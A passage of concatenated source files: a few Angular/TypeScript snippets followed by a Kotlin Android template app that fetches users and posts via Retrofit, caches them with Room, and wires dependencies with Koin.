}<file_sep>export class IdentityModel{
constructor(
public name: string,
public firstname: string,
public secondname: string,
public sex: string,
public dateofbirth: string,
public height: string
){}
}<file_sep>export const Global = {
URLAuthentication:"http://192.168.127.12:30120/S2VAPI/authenticate",
URLUsers:"http://192.168.127.12:30120/S2VAPI/users",
URLJobs: "http://192.168.127.12:30120/S2VAPI/jobs",
urllocal:'http://localhost:3000/'
};<file_sep>import { Pipe, PipeTransform } from '@angular/core';
@Pipe({
name: 'genero'
})
export class GeneroPipe implements PipeTransform {
transform(value: unknown): string {
if (value === 'm') {
return 'Hombre';
} else {
return 'Mujer';
}
}
}
<file_sep>package com.example.template.user
import com.example.template.tools.base.BaseViewModel
import com.example.template.useCases.UserUseCase
class UserViewModel(
userRepository: UserUseCase
) : BaseViewModel() {
val items = userRepository.getUsers()
}<file_sep>package com.example.template.remote.model
import com.example.template.model.Company
data class CompanyDto(
val bs: String,
val catchPhrase: String,
val name: String
)
fun CompanyDto.toCompany() = Company(
bs,
catchPhrase,
name
)<file_sep>package com.example.template.model
import com.example.template.cache.model.AddressEntity
data class Address(
val city: String,
val geo: Geo,
val street: String,
val suite: String,
val zipcode: String
)
internal fun Address.toAddressEntity() = AddressEntity(
city,
geo.toGeoEntity(),
street,
suite,
zipcode
)<file_sep>package com.example.template.remote
import retrofit2.Response
internal abstract class BaseRemoteRepository {
fun <T, D : Any> Response<T>.convertToOutput(mapFunction: (T) -> D): Output<D> {
if (!isSuccessful)
return Output.Error(ErrorEnum.NOT_SUCCESSFULLY)
return try {
// body() may be null (e.g. an empty 204 response); report an error instead of throwing an NPE
val data = body() ?: return Output.Error(ErrorEnum.NOT_SUCCESSFULLY)
val mappedData = mapFunction(data)
Output.Success(mappedData)
} catch (cce: ClassCastException) {
Output.Error(ErrorEnum.MAP_CAST_EXCEPTION)
}
}
}<file_sep>package com.example.template.cache
import androidx.room.Database
import androidx.room.RoomDatabase
import androidx.room.TypeConverters
import com.example.template.cache.user.UserDao
import com.example.template.cache.model.PostEntity
import com.example.template.cache.model.UserEntity
import com.example.template.cache.post.PostDao
@Database(
entities = [UserEntity::class, PostEntity::class],
version = 2
)
@TypeConverters(DatabaseConverters::class)
internal abstract class MyDatabase : RoomDatabase() {
abstract fun getUserDao(): UserDao
abstract fun getPostsDao(): PostDao
}<file_sep>package com.example.template.di
import com.example.template.cache.DatabaseClient
import com.example.template.cache.MyDatabase
import com.example.template.cache.post.PostCacheRepository
import com.example.template.cache.post.PostCacheRepositoryImpl
import com.example.template.cache.user.UserCacheRepository
import com.example.template.cache.user.UserCacheRepositoryImpl
import com.example.template.remote.ApiUtils
import com.example.template.remote.OkHttp
import com.example.template.remote.user.UserRemoteRepository
import com.example.template.remote.user.UserRemoteRepositoryImpl
import com.example.template.remote.user.UserService
import com.example.template.remote.user.UserServiceImpl
import okhttp3.Interceptor
import org.koin.dsl.module
internal object DataKoinModules {
val dataModules = listOf(
remoteModules(),
cacheModules(),
repoModules()
)
private fun remoteModules() = module {
single<Interceptor> { OkHttp.getLogsInterceptor() }
single { OkHttp.getClient(get()) }
single { ApiUtils.getUserInterface(get()) }
single<UserService> { UserServiceImpl(get()) }
}
private fun cacheModules() = module {
single { DatabaseClient.getInstance(get()) }
single { get<MyDatabase>().getUserDao() }
single { get<MyDatabase>().getPostsDao() }
}
private fun repoModules() = module {
single<UserRemoteRepository> { UserRemoteRepositoryImpl(get()) }
single<UserCacheRepository> { UserCacheRepositoryImpl(get()) }
single<PostCacheRepository> { PostCacheRepositoryImpl(get()) }
}
}<file_sep>package com.example.template.cache.post
import androidx.lifecycle.LiveData
import androidx.lifecycle.Transformations
import com.example.template.cache.model.toPosts
import com.example.template.model.Post
import com.example.template.model.toEntities
interface PostCacheRepository {
fun getAllPosts(userId: Int): LiveData<List<Post>>
suspend fun savePosts(posts: List<Post>)
}
internal class PostCacheRepositoryImpl(private val postDao: PostDao) : PostCacheRepository {
override fun getAllPosts(userId: Int): LiveData<List<Post>> =
Transformations.map(postDao.getPosts(userId)) { it.toPosts() }
override suspend fun savePosts(posts: List<Post>) {
postDao.insert(posts.toEntities())
}
}<file_sep>package com.example.template.tools.base
import androidx.lifecycle.ViewModel
abstract class BaseViewModel : ViewModel()<file_sep>package com.example.template.remote.user
import com.example.template.model.Post
import com.example.template.model.User
import com.example.template.remote.BaseRemoteRepository
import com.example.template.remote.Output
import com.example.template.remote.model.toPosts
import com.example.template.remote.model.toUsers
interface UserRemoteRepository {
suspend fun getUsers(): Output<List<User>>
suspend fun getPosts(userId: Int): Output<List<Post>>
}
internal class UserRemoteRepositoryImpl(private val userService: UserService) :
UserRemoteRepository, BaseRemoteRepository() {
override suspend fun getUsers() =
userService.getUsers().convertToOutput {
it.toUsers()
}
override suspend fun getPosts(userId: Int) = userService.getPosts(userId).convertToOutput {
it.toPosts()
}
}<file_sep>package com.example.template.di
import com.example.template.DataFactory
import com.example.template.useCases.PostUseCase
import com.example.template.useCases.PostUseCaseImpl
import com.example.template.useCases.UserUseCase
import com.example.template.useCases.UserUseCaseImpl
import org.koin.dsl.module
internal object DomainKoinModules {
val domainModules = listOf(useCaseModules(), dataRepositoryModules())
private fun useCaseModules() = module {
factory<UserUseCase> { UserUseCaseImpl(get(), get()) }
factory<PostUseCase> { PostUseCaseImpl(get(), get()) }
}
private fun dataRepositoryModules() = module {
single { DataFactory.userRemoteRepository }
single { DataFactory.userCacheRepository }
single { DataFactory.postCacheRepository }
}
}<file_sep>package com.example.template.cache.model
import androidx.room.*
import com.example.template.cache.tools.BaseEntityItem
import com.example.template.model.Post
@Entity(
tableName = PostEntity.TABLE_NAME,
foreignKeys = [
ForeignKey(
entity = UserEntity::class,
parentColumns = [UserEntity.COLUMN_ID],
childColumns = [PostEntity.COLUMN_USER_ID],
onDelete = ForeignKey.CASCADE
)],
indices = [Index(PostEntity.COLUMN_USER_ID)]
)
internal data class PostEntity(
@PrimaryKey
@ColumnInfo(name = COLUMN_ID)
override val id: Long,
val body: String,
val title: String,
@ColumnInfo(name = COLUMN_USER_ID)
val userId: Int
) : BaseEntityItem {
companion object {
const val TABLE_NAME = "table_post"
const val COLUMN_ID = "post_id"
const val COLUMN_USER_ID = "user_id_child"
}
}
internal fun PostEntity.toPost() = Post(
id.toInt(),
body,
title,
userId
)
internal fun List<PostEntity>.toPosts() = map { it.toPost() }<file_sep>package com.example.template
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import androidx.navigation.NavController
import androidx.navigation.findNavController
import androidx.navigation.ui.AppBarConfiguration
import androidx.navigation.ui.NavigationUI
import androidx.navigation.ui.setupActionBarWithNavController
import kotlinx.android.synthetic.main.toolbar.*
class MainActivity : AppCompatActivity() {
private lateinit var navController: NavController
private val appBarConfiguration by lazy {
AppBarConfiguration.Builder(navController.graph).build()
}
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
navController = findNavController(R.id.nav_host_fragment)
setupActionBar()
}
private fun setupActionBar() {
setSupportActionBar(toolbar)
setupActionBarWithNavController(navController)
}
override fun onSupportNavigateUp() = NavigationUI.navigateUp(navController, appBarConfiguration)
}
<file_sep>package com.example.template.tools.base
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.databinding.DataBindingUtil
import androidx.databinding.ViewDataBinding
import androidx.recyclerview.widget.DiffUtil
import androidx.recyclerview.widget.ListAdapter
import androidx.recyclerview.widget.RecyclerView
import com.example.template.tools.BaseItem
abstract class BaseAdapter<T : BaseItem> : ListAdapter<T, BaseViewHolder>(BaseDiffUtil<T>()) {
override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): BaseViewHolder {
val inflater = LayoutInflater.from(parent.context)
val binding: ViewDataBinding = DataBindingUtil.inflate(inflater, getLayout(), parent, false)
return BaseViewHolder(binding)
}
abstract fun getLayout(): Int
override fun onBindViewHolder(holder: BaseViewHolder, position: Int) {
val item = getItem(position)
item?.let {
bindingData(holder.binding, it)
}
}
abstract fun bindingData(binding: ViewDataBinding, item: T)
}
class BaseViewHolder(val binding: ViewDataBinding) : RecyclerView.ViewHolder(binding.root)
class BaseDiffUtil<T : BaseItem> : DiffUtil.ItemCallback<T>() {
override fun areItemsTheSame(oldItem: T, newItem: T) =
oldItem.id == newItem.id
override fun areContentsTheSame(oldItem: T, newItem: T) =
oldItem == newItem
}<file_sep>package com.example.template.model
import com.example.template.cache.model.GeoEntity
data class Geo(
val lat: String,
val lng: String
)
internal fun Geo.toGeoEntity() = GeoEntity(
lat,
lng
)<file_sep>package com.example.template.useCases
internal abstract class BaseUseCase<file_sep>package com.example.template.cache.user
import androidx.lifecycle.LiveData
import androidx.lifecycle.Transformations
import com.example.template.cache.model.toUsers
import com.example.template.cache.tools.diffUtil.BaseDiffCallback
import com.example.template.model.User
import com.example.template.model.toUserEntities
interface UserCacheRepository {
fun getAllUsers(): LiveData<List<User>>
suspend fun saveUsers(users: List<User>)
}
internal class UserCacheRepositoryImpl(private val userDao: UserDao) : UserCacheRepository {
override fun getAllUsers(): LiveData<List<User>> =
Transformations.map(userDao.getAllLiveItems()) { it.toUsers() }
override suspend fun saveUsers(users: List<User>) {
userDao.makeDiff(
BaseDiffCallback(
oldList = userDao.getALlItems(),
newList = users.toUserEntities()
)
)
}
}<file_sep>package com.example.template.useCases
import androidx.lifecycle.LiveData
import androidx.lifecycle.liveData
import com.example.template.cache.post.PostCacheRepository
import com.example.template.model.Post
import com.example.template.remote.Output
import com.example.template.remote.user.UserRemoteRepository
import kotlinx.coroutines.Dispatchers
interface PostUseCase {
fun getPosts(userId: Int): LiveData<List<Post>>
}
internal class PostUseCaseImpl(
private val remote: UserRemoteRepository,
private val cache: PostCacheRepository
) : PostUseCase, BaseUseCase() {
override fun getPosts(userId: Int) = liveData(Dispatchers.IO) {
emitSource(cache.getAllPosts(userId))
val postOutput = remote.getPosts(userId)
if (postOutput is Output.Success)
cache.savePosts(postOutput.data)
}
}<file_sep>package com.example.template
import com.example.template.cache.post.PostCacheRepository
import com.example.template.cache.user.UserCacheRepository
import com.example.template.di.DataKoinComponent
import com.example.template.remote.user.UserRemoteRepository
import org.koin.core.inject
object DataFactory : DataKoinComponent() {
val userRemoteRepository: UserRemoteRepository by inject()
val userCacheRepository: UserCacheRepository by inject()
val postCacheRepository: PostCacheRepository by inject()
}<file_sep>package com.example.template.cache.model
import com.example.template.model.Geo
internal data class GeoEntity(
val lat: String,
val lng: String
)
internal fun GeoEntity.toGeo() = Geo(
lat,
lng
)<file_sep>package com.example.template.cache.model
import androidx.room.ColumnInfo
import com.example.template.model.Company
internal data class CompanyEntity(
val bs: String,
val catchPhrase: String,
@ColumnInfo(name = COLUMN_NAME)
val name: String
) {
companion object {
const val COLUMN_NAME = UserEntity.COMPANY_PREFIX + "column_name"
}
}
internal fun CompanyEntity.toCompany() = Company(
bs,
catchPhrase,
name
)<file_sep>package com.example.template.cache.tools.diffUtil
import com.example.template.cache.tools.BaseEntityItem
interface DiffCallback<T> {
fun getOldItemList(): Collection<T>
fun getNewItemList(): Collection<T>
fun areItemsTheSame(oldItem: T, newItem: T): Boolean
}
internal open class BaseDiffCallback<T : BaseEntityItem>(
private val oldList: List<T>,
private val newList: List<T>
) : DiffCallback<T> {
override fun getOldItemList(): Collection<T> = oldList
override fun getNewItemList(): Collection<T> = newList
override fun areItemsTheSame(oldItem: T, newItem: T) = (oldItem.id == newItem.id)
}
internal class BaseDiffCallbackForItem<T : BaseEntityItem>(
oldItem: T,
newItem: T
) :
BaseDiffCallback<T>(
listOf(oldItem),
listOf(newItem)
)
<file_sep>package com.example.template
import android.app.Application
object DataComponent {
private lateinit var application: Application
fun init(application: Application){
this.application = application
}
fun getAppContext() = application
}<file_sep>package com.example.template.posts
import com.example.template.tools.base.BaseViewModel
import com.example.template.useCases.PostUseCase
class PostViewModel(userId: Int, postUseCase: PostUseCase) :
BaseViewModel() {
val items = postUseCase.getPosts(userId)
}<file_sep>package com.example.template.model
import com.example.template.cache.model.UserEntity
import com.example.template.tools.BaseItem
data class User(
override val id: Int,
val address: Address,
val company: Company,
val email: String,
val name: String,
val phone: String,
val username: String,
val website: String
) : BaseItem
internal fun User.toUserEntity() = UserEntity(
id.toLong(),
address.toAddressEntity(),
company.toCompanyEntity(),
email,
name,
phone,
username,
website
)
internal fun List<User>.toUserEntities() = map { it.toUserEntity() }<file_sep>package com.example.template.cache.model
import com.example.template.model.Address
internal data class AddressEntity(
val city: String,
val geo: GeoEntity,
val street: String,
val suite: String,
val zipcode: String
)
internal fun AddressEntity.toAddress() = Address(
city,
geo.toGeo(),
street,
suite,
zipcode
)<file_sep>const val kotlinVersion = "1.3.61"
object BuildPlugins {
const val buildToolsVersion = "29.0.2"
object Versions {
const val buildGradleVersion = "3.5.3"
const val safeArgs = "1.0.0-alpha04"
}
const val androidGradlePlugin = "com.android.tools.build:gradle:${Versions.buildGradleVersion}"
const val kotlinGradlePlugin = "org.jetbrains.kotlin:kotlin-gradle-plugin:$kotlinVersion"
const val safeArgs = "android.arch.navigation:navigation-safe-args-gradle-plugin:${Versions.safeArgs}"
const val androidApplication = "com.android.application"
const val androidLibrary = "com.android.library"
const val kotlinAndroid = "kotlin-android"
const val kotlinAndroidExtensions = "kotlin-android-extensions"
const val kotlinKapt = "kotlin-kapt"
const val safeArgsPlugin = "androidx.navigation.safeargs"
}
object AndroidSdk {
const val min = 23
const val compile = 29
const val target = compile
}
object Libraries {
private object Versions {
const val appcompat = "1.1.0"
const val constraintLayout = "1.1.3"
const val ktx = "1.1.0"
const val navigation_component = "1.0.0"
const val koin = "2.0.1"
const val moshi = "1.8.0"
const val retrofit = "2.6.0"
const val retrofit_moshi = "2.5.0"
const val retrofit_coroutines = "0.9.2"
const val okhttp = "3.12.0"
const val okhttpInterceptor = "3.11.0"
const val coroutines = "1.3.3"
const val glide = "4.10.0"
const val lifecycleViewmodel = "2.2.0-rc03"
const val room = "2.2.3"
const val legacy = "1.0.0"
const val liveDataKtx = "2.2.0-rc03"
}
const val kotlinStdLib = "org.jetbrains.kotlin:kotlin-stdlib-jdk8:$kotlinVersion"
const val material = "com.google.android.material:material:1.0.0"
const val timber = "com.jakewharton.timber:timber:4.7.1"
const val navigationFragment =
"android.arch.navigation:navigation-fragment-ktx:${Libraries.Versions.navigation_component}"
const val navigationUI =
"android.arch.navigation:navigation-ui-ktx:${Libraries.Versions.navigation_component}"
const val koin = "org.koin:koin-android:${Libraries.Versions.koin}"
const val koinViewmodel = "org.koin:koin-android-viewmodel:${Libraries.Versions.koin}"
const val moshi = "com.squareup.moshi:moshi-kotlin:${Libraries.Versions.moshi}"
const val moshiKapt = "com.squareup.moshi:moshi-kotlin-codegen:${Libraries.Versions.moshi}"
const val retrofit = "com.squareup.retrofit2:retrofit:${Libraries.Versions.retrofit}"
const val retrofitMoshi =
"com.squareup.retrofit2:converter-moshi:${Libraries.Versions.retrofit_moshi}"
const val retrofitCoroutines =
"com.jakewharton.retrofit:retrofit2-kotlin-coroutines-adapter:${Libraries.Versions.retrofit_coroutines}"
const val okhttp = "com.squareup.okhttp3:okhttp:${Libraries.Versions.okhttp}"
const val okhttpInterceptor =
"com.squareup.okhttp3:logging-interceptor:${Libraries.Versions.okhttpInterceptor}"
const val coroutines =
"org.jetbrains.kotlinx:kotlinx-coroutines-android:${Libraries.Versions.coroutines}"
const val coroutinesCore =
"org.jetbrains.kotlinx:kotlinx-coroutines-core:${Libraries.Versions.coroutines}"
const val glide = "com.github.bumptech.glide:glide:${Libraries.Versions.glide}"
const val glideKapt = "com.github.bumptech.glide:compiler:${Libraries.Versions.glide}"
const val liveDataKtx = "androidx.lifecycle:lifecycle-livedata-ktx:${Versions.liveDataKtx}"
object AndroidX {
const val appCompat = "androidx.appcompat:appcompat:${Libraries.Versions.appcompat}"
const val constraintLayout =
"androidx.constraintlayout:constraintlayout:${Versions.constraintLayout}"
const val ktxCore = "androidx.core:core-ktx:${Versions.ktx}"
const val recyclerView = "androidx.recyclerview:recyclerview:1.1.0"
const val lifecycleViewmodel =
"androidx.lifecycle:lifecycle-viewmodel-ktx:${Libraries.Versions.lifecycleViewmodel}"
const val room = "androidx.room:room-runtime:${Libraries.Versions.room}"
const val roomKapt = "androidx.room:room-compiler:${Libraries.Versions.room}"
const val roomKtx = "androidx.room:room-ktx:${Libraries.Versions.room}"
const val legacy = "androidx.legacy:legacy-support-v4:${Libraries.Versions.legacy}"
}
}
object TestLibraries {
private object Versions {
const val junit4 = "4.12"
const val testExt = "1.1.1"
const val espresso = "3.2.0"
}
const val junit4 = "junit:junit:${Versions.junit4}"
const val junitTestExt = "androidx.test.ext:junit:${Versions.testExt}"
const val espresso = "androidx.test.espresso:espresso-core:${Versions.espresso}"
}<file_sep>package com.example.template.cache
import androidx.room.TypeConverter
import com.example.template.cache.model.AddressEntity
import com.example.template.cache.model.CompanyEntity
import com.example.template.cache.model.GeoEntity
import com.squareup.moshi.Moshi
internal class DatabaseConverters {
@TypeConverter
fun encodeAddress(address: AddressEntity) =
Moshi.Builder().build().adapter(AddressEntity::class.java).toJson(address)
@TypeConverter
fun decodeAddress(addressEntityString: String) =
Moshi.Builder().build().adapter(AddressEntity::class.java).fromJson(addressEntityString)!!
@TypeConverter
fun encodeCompany(company: CompanyEntity) =
Moshi.Builder().build().adapter(CompanyEntity::class.java).toJson(company)
@TypeConverter
fun decodeCompany(companyEntityString: String) =
Moshi.Builder().build().adapter(CompanyEntity::class.java).fromJson(companyEntityString)!!
@TypeConverter
fun encodeGeo(geo: GeoEntity) =
Moshi.Builder().build().adapter(GeoEntity::class.java).toJson(geo)
@TypeConverter
fun decodeGeo(geoEntityString: String) =
Moshi.Builder().build().adapter(GeoEntity::class.java).fromJson(geoEntityString)!!
}<file_sep>package com.example.template.tools.extensions
import androidx.fragment.app.FragmentActivity
import androidx.recyclerview.widget.DefaultItemAnimator
import androidx.recyclerview.widget.DividerItemDecoration
import androidx.recyclerview.widget.RecyclerView
fun RecyclerView.addDefaultConfiguration(activity: FragmentActivity?) {
activity?.let {
itemAnimator = DefaultItemAnimator()
addItemDecoration(DividerItemDecoration(it, RecyclerView.VERTICAL))
}
}<file_sep>package com.example.template.cache.user
import androidx.lifecycle.LiveData
import androidx.room.Dao
import androidx.room.Query
import com.example.template.cache.tools.BaseDao
import com.example.template.cache.model.UserEntity
@Dao
internal abstract class UserDao : BaseDao<UserEntity>() {
companion object {
const val GET_USERS = "SELECT * FROM ${UserEntity.TABLE_NAME}"
const val CLEAR_TABLE = "DELETE FROM ${UserEntity.TABLE_NAME}"
}
@Query(GET_USERS)
abstract override fun getAllLiveItems(): LiveData<List<UserEntity>>
@Query(GET_USERS)
abstract override fun getALlItems(): List<UserEntity>
@Query(CLEAR_TABLE)
abstract override suspend fun clearTable()
}<file_sep>package com.example.template.di
import com.example.template.DataComponent
import org.koin.android.ext.koin.androidContext
import org.koin.core.Koin
import org.koin.core.KoinComponent
import org.koin.dsl.koinApplication
abstract class DataKoinComponent : KoinComponent {
private val dataKoin = koinApplication {
androidContext(DataComponent.getAppContext())
modules(DataKoinModules.dataModules)
}
override fun getKoin(): Koin {
return dataKoin.koin
}
}<file_sep>package com.example.template.di
import com.example.template.DomainFactory
import com.example.template.posts.PostViewModel
import com.example.template.user.UserViewModel
import org.koin.android.viewmodel.dsl.viewModel
import org.koin.dsl.module
object PresentationKoinModules {
val presentationModule = listOf(useCaseModules(), viewModelModules())
private fun useCaseModules() = module {
factory { DomainFactory.userUseCase }
factory { DomainFactory.postUseCase }
}
private fun viewModelModules() = module {
viewModel { UserViewModel(get()) }
viewModel { (userId: Int) -> PostViewModel(userId, get()) }
}
}<file_sep>package com.example.template.cache.post
import androidx.lifecycle.LiveData
import androidx.room.Dao
import androidx.room.Query
import com.example.template.cache.model.PostEntity
import com.example.template.cache.tools.BaseDao
@Dao
internal abstract class PostDao : BaseDao<PostEntity>() {
companion object {
const val GET_POSTS = "SELECT * FROM ${PostEntity.TABLE_NAME}"
const val GET_USER_POSTS = GET_POSTS + " WHERE ${PostEntity.COLUMN_USER_ID} = :userId"
const val CLEAR_TABLE = "DELETE FROM ${PostEntity.TABLE_NAME}"
}
@Query(GET_POSTS)
abstract override fun getAllLiveItems(): LiveData<List<PostEntity>>
@Query(GET_POSTS)
abstract override fun getALlItems(): List<PostEntity>
@Query(GET_USER_POSTS)
abstract fun getPosts(userId: Int): LiveData<List<PostEntity>>
@Query(CLEAR_TABLE)
abstract override suspend fun clearTable()
}<file_sep>package com.example.template.user
import android.os.Bundle
import android.view.View
import androidx.navigation.fragment.findNavController
import androidx.recyclerview.widget.RecyclerView
import com.example.template.R
import com.example.template.databinding.FragmentUserBinding
import com.example.template.model.User
import com.example.template.tools.base.BaseBindableFragment
import com.example.template.tools.base.ItemClickListener
import com.example.template.tools.extensions.addDefaultConfiguration
import kotlinx.android.synthetic.main.fragment_user.*
import org.koin.android.viewmodel.ext.android.viewModel
class UserFragment : BaseBindableFragment<FragmentUserBinding>(), ItemClickListener<User> {
private val mViewModel: UserViewModel by viewModel()
private val mAdapter by lazy { UserAdapter(this) }
override fun getLayout() = R.layout.fragment_user
override fun onItemClicked(item: User) {
val userId = item.id
val action = UserFragmentDirections.goToPosts(userId)
findNavController().navigate(action)
}
override fun bindingData(mBinding: FragmentUserBinding) {
mBinding.viewModel = mViewModel
}
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
setupRecyclerView(rvUsers)
}
private fun setupRecyclerView(recyclerView: RecyclerView) {
with(recyclerView) {
addDefaultConfiguration(activity)
adapter = mAdapter
}
}
}<file_sep>package com.example.template.remote.user
import com.example.template.remote.model.PostDto
import com.example.template.remote.model.UserDto
import retrofit2.Response
import retrofit2.http.GET
import retrofit2.http.Query
internal interface UserInterface {
@GET("/users")
suspend fun getUsers(): Response<List<UserDto>>
@GET("/posts")
suspend fun getPosts(@Query("userId") userId: Int): Response<List<PostDto>>
}<file_sep>package com.example.template.cache.tools
import androidx.lifecycle.LiveData
import androidx.room.*
import com.example.template.cache.tools.diffUtil.DiffCallback
import com.example.template.cache.tools.diffUtil.EntityDiffUtil
internal abstract class BaseDao<T> {
abstract fun getAllLiveItems(): LiveData<List<T>>
abstract fun getALlItems(): List<T>
abstract suspend fun clearTable()
@Insert(onConflict = OnConflictStrategy.REPLACE)
abstract suspend fun insert(item: T)
@Insert(onConflict = OnConflictStrategy.REPLACE)
abstract suspend fun insert(items: List<T>)
@Update
abstract suspend fun update(item: T)
@Update
abstract suspend fun update(items: List<T>)
@Delete
abstract suspend fun delete(item: T)
@Delete
abstract suspend fun delete(items: List<T>)
@Transaction
open suspend fun makeDiff(diffCallback: DiffCallback<T>) =
EntityDiffUtil(diffCallback).dispatchDiffUpdate(this)
}<file_sep>package com.example.template.remote
import okhttp3.Interceptor
import okhttp3.OkHttpClient
import okhttp3.logging.HttpLoggingInterceptor
internal object OkHttp {
fun getClient(vararg interceptor: Interceptor): OkHttpClient =
OkHttpClient.Builder().apply {
interceptor.forEach {
addInterceptor(it)
}
}.build()
fun getLogsInterceptor() =
HttpLoggingInterceptor().apply { level = HttpLoggingInterceptor.Level.BODY }
}
<file_sep>package com.example.template
import android.app.Application
import com.example.template.di.PresentationKoinModules
import org.koin.android.ext.koin.androidContext
import org.koin.core.context.startKoin
class MyApp : Application() {
override fun onCreate() {
super.onCreate()
DomainComponent.init(this)
startKoin {
androidContext(this@MyApp)
modules(
PresentationKoinModules.presentationModule
)
}
}
}<file_sep>package com.example.template.remote
sealed class Output<out T : Any> {
data class Success<out T : Any>(val data: T) : Output<T>()
data class Error(val errorEnum: ErrorEnum) : Output<Nothing>()
}
enum class ErrorEnum {
NOT_SUCCESSFULLY,
MAP_CAST_EXCEPTION
}<file_sep>package com.example.template.useCases
import androidx.lifecycle.LiveData
import androidx.lifecycle.liveData
import com.example.template.cache.user.UserCacheRepository
import com.example.template.model.User
import com.example.template.remote.Output
import com.example.template.remote.user.UserRemoteRepository
import kotlinx.coroutines.Dispatchers
interface UserUseCase {
fun getUsers(): LiveData<List<User>>
}
internal class UserUseCaseImpl(
private val remote: UserRemoteRepository,
private val cache: UserCacheRepository
) : UserUseCase, BaseUseCase() {
override fun getUsers() = liveData(Dispatchers.IO) {
emitSource(cache.getAllUsers())
val userOutput = remote.getUsers()
if(userOutput is Output.Success)
cache.saveUsers(userOutput.data)
}
}<file_sep>import Libraries.AndroidX
plugins {
id(BuildPlugins.androidLibrary)
id(BuildPlugins.kotlinAndroid)
id(BuildPlugins.kotlinAndroidExtensions)
id(BuildPlugins.kotlinKapt)
}
android {
compileSdkVersion(AndroidSdk.compile)
buildToolsVersion(BuildPlugins.buildToolsVersion)
defaultConfig {
minSdkVersion(AndroidSdk.min)
targetSdkVersion(AndroidSdk.target)
consumerProguardFiles("consumer-rules.pro")
}
buildTypes {
getByName("release") {
isMinifyEnabled = true
proguardFiles(
getDefaultProguardFile("proguard-android-optimize.txt"),
"consumer-rules.pro"
)
}
}
}
dependencies {
implementation(fileTree(mapOf("dir" to "libs", "include" to listOf("*.jar"))))
implementation(Libraries.kotlinStdLib)
implementation(AndroidX.appCompat)
implementation(AndroidX.ktxCore)
implementation(Libraries.timber)
implementation(AndroidX.room)
implementation(AndroidX.roomKtx)
kapt(AndroidX.roomKapt)
implementation(Libraries.moshi)
kapt(Libraries.moshiKapt)
implementation(Libraries.retrofit)
implementation(Libraries.retrofitCoroutines)
implementation(Libraries.retrofitMoshi)
implementation(Libraries.okhttp)
implementation(Libraries.okhttpInterceptor)
implementation(Libraries.koin)
testImplementation(TestLibraries.junit4)
androidTestImplementation(TestLibraries.junitTestExt)
androidTestImplementation(TestLibraries.espresso)
}<file_sep>package com.example.template.remote.model
import com.example.template.model.Post
internal data class PostDto(
val body: String,
val id: Int,
val title: String,
val userId: Int
)
internal fun PostDto.toPost() = Post(
id,
body,
title,
userId
)
internal fun List<PostDto>.toPosts() = map { it.toPost() }<file_sep>package com.example.template.cache.tools.diffUtil
import com.example.template.cache.tools.BaseDao
internal class EntityDiffUtil<T>(private val diffCallback: DiffCallback<T>) {
suspend fun dispatchDiffUpdate(dao: BaseDao<T>) {
val newEntryList = diffCallback.getNewItemList()
val oldEntryList = diffCallback.getOldItemList()
val (commonEntries, newEntries) = newEntryList.partition { newEntry ->
oldEntryList.any { diffCallback.areItemsTheSame(it, newEntry) }
}
val removedEntries = oldEntryList.filterNot { oldEntry ->
commonEntries.any { diffCallback.areItemsTheSame(oldEntry, it) }
}
dao.delete(removedEntries)
dao.update(commonEntries)
dao.insert(newEntries)
}
}<file_sep>package com.example.template.user
import androidx.databinding.ViewDataBinding
import androidx.databinding.library.baseAdapters.BR
import com.example.template.R
import com.example.template.model.User
import com.example.template.tools.base.BaseAdapter
import com.example.template.tools.base.ItemClickListener
class UserAdapter(private val mListener: ItemClickListener<User>) : BaseAdapter<User>() {
override fun getLayout() = R.layout.item_user
override fun bindingData(binding: ViewDataBinding, item: User) {
binding.setVariable(BR.User, item)
binding.setVariable(BR.Listener, mListener)
binding.executePendingBindings()
}
}<file_sep>package com.example.template.remote
import com.jakewharton.retrofit2.adapter.kotlin.coroutines.CoroutineCallAdapterFactory
import okhttp3.OkHttpClient
import retrofit2.Retrofit
import retrofit2.converter.moshi.MoshiConverterFactory
internal object RetrofitClient {
fun getClient(okHttpClient: OkHttpClient, baseUrl: String): Retrofit = Retrofit.Builder()
.client(okHttpClient)
.baseUrl(baseUrl)
.addConverterFactory(MoshiConverterFactory.create())
.addCallAdapterFactory(CoroutineCallAdapterFactory())
.build()
}<file_sep>package com.example.template.model
import com.example.template.cache.model.PostEntity
import com.example.template.tools.BaseItem
data class Post(
override val id: Int,
val body: String,
val title: String,
val userId: Int
): BaseItem
internal fun Post.toEntity() = PostEntity(
id.toLong(),
body,
title,
userId
)
internal fun List<Post>.toEntities() = map { it.toEntity() }<file_sep>package com.example.template.posts
import android.os.Bundle
import android.view.View
import androidx.recyclerview.widget.RecyclerView
import com.example.template.R
import com.example.template.databinding.FragmentPostBinding
import com.example.template.tools.base.BaseBindableFragment
import com.example.template.tools.extensions.addDefaultConfiguration
import kotlinx.android.synthetic.main.fragment_post.*
import org.koin.android.viewmodel.ext.android.viewModel
import org.koin.core.parameter.parametersOf
class PostFragment : BaseBindableFragment<FragmentPostBinding>() {
private val mViewModel: PostViewModel by viewModel {
val userId = PostFragmentArgs.fromBundle(arguments).userId
parametersOf(userId)
}
private val mAdapter by lazy { PostAdapter() }
override fun getLayout() = R.layout.fragment_post
override fun bindingData(mBinding: FragmentPostBinding) {
mBinding.viewModel = mViewModel
}
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
setupRecyclerView(rvPosts)
}
private fun setupRecyclerView(recyclerView: RecyclerView) {
with(recyclerView) {
addDefaultConfiguration(activity)
adapter = mAdapter
}
}
}<file_sep>package com.example.template
import android.app.Application
object DomainComponent {
fun init(application: Application) {
DataComponent.init(application)
}
}<file_sep>package com.example.template.di
import org.koin.core.Koin
import org.koin.core.KoinComponent
import org.koin.dsl.koinApplication
abstract class DomainKoinComponent : KoinComponent {
private val domainKoin = koinApplication {
modules(DomainKoinModules.domainModules)
}
override fun getKoin(): Koin {
return domainKoin.koin
}
}<file_sep>package com.example.template.cache
import android.content.Context
import androidx.room.Room
const val DATABASE_NAME = "database_name"
internal object DatabaseClient {
@Volatile
private var INSTANCE: MyDatabase? = null
fun getInstance(context: Context): MyDatabase =
INSTANCE ?: synchronized(this) {
INSTANCE ?: buildDatabase(context).also { INSTANCE = it }
}
private fun buildDatabase(context: Context) =
Room.databaseBuilder(
context.applicationContext,
MyDatabase::class.java, DATABASE_NAME
)
